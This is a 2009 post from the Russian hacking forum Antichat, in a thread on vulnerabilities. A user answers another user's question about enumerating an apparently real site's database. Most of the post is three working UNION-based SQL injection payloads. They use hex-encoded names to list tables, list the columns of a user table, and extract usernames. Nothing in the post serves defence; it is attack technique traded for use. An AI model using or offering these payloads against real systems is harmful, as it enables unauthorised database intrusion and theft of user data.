ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 18.11.2009, 21:04
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от fng  
вообще там бред какой-то
поля получается перебирать все из information_schema, а просто по таблицам нет O_o

т.е. я делал выборку из таблицы columns, но лимит срабатывал только когда в выборке участвовало поле column_name

есть у кого предположения почему там так?
Я не понял что у тебя срабатывает, что не срабатывает. Самая заурядная скуля

-36))+union+select+1,2,3,4,unhex(hex(group_concat(t able_name))),6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3 ,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,1+from+info rmation_schema.columns+where+column_name+like+0x25 757365726e616d6525--+
-36))+union+select+1,2,3,4,5,unhex(hex(group_concat (column_name))),7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2, 3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,1+from+inf ormation_schema.columns+where+table_name=0x6578707 45f75736572--+
-36))+union+select+1,2,3,4,unhex(hex(username)),6,7 ,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10, 1,2,3,4,5,6,7,8,9,10,1,1+from+expt_user+limit+0,1--+
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ